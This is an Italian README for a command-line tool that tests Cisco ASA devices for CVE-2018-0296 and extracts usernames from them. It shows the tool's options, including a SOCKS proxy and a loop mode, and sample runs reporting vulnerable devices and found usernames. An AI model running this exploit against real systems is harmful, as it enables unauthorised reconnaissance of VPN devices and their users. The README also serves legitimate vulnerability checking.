
Testa CVE-2018-0296 ed estrai i nomi utente
Testa CVE-2018-0296 ed estrae i nomi utente da Cisco ASA.
Per maggiori dettagli tecnici, consulta https://sekurak.pl/opis-bledu-cve-2018-0296-ominiecie-uwierzytelnienia-w-webinterfejsie-cisco-asa/.
#Menu di aiuto
$ ./CVE-2018-0296 -h
Opzioni:
-h, --help mostra le informazioni di aiuto
-u, --url URL del dispositivo target
-i IP del proxy SOCKS
-p Porta del proxy SOCKS
-t, --time Numero di secondi di pausa tra i cicli
--loop Modalità loop
#Guida all'uso
$ ./CVE-2018-0296 -u https://x.x.x.x:443
[*] Controllo: https://x.x.x.x:443
[+] https://x.x.x.x:443 [Cisco VPN]
[+] https://x.x.x.x:443 [Vulnerabile]
[*] Nomi utente trovati
testuser1
$ ./CVE-2018-0296 -u https://www.yahoo.com:443
[*] Controllo: https://www.yahoo.com
[+] https://www.yahoo.com [NON Cisco VPN]
$ ./CVE-2018-0296 -u https://x.x.x.x:443
[*] Controllo: https://x.x.x.x
[+] https://x.x.x.x [Cisco VPN]
[+] https://x.x.x.x [Vulnerabile]
[*] Nessun nome utente trovato
$ ./CVE-2018-0296 -i 127.0.0.1 -p 10000 --loop 10 -u https://x.x.x.x:443
[*] Controllo: https://x.x.x.x:443
[+] https://x.x.x.x:443 [Cisco VPN]
[+] https://x.x.x.x:443 [Vulnerabile]
[*] Nomi utente trovati
testuser1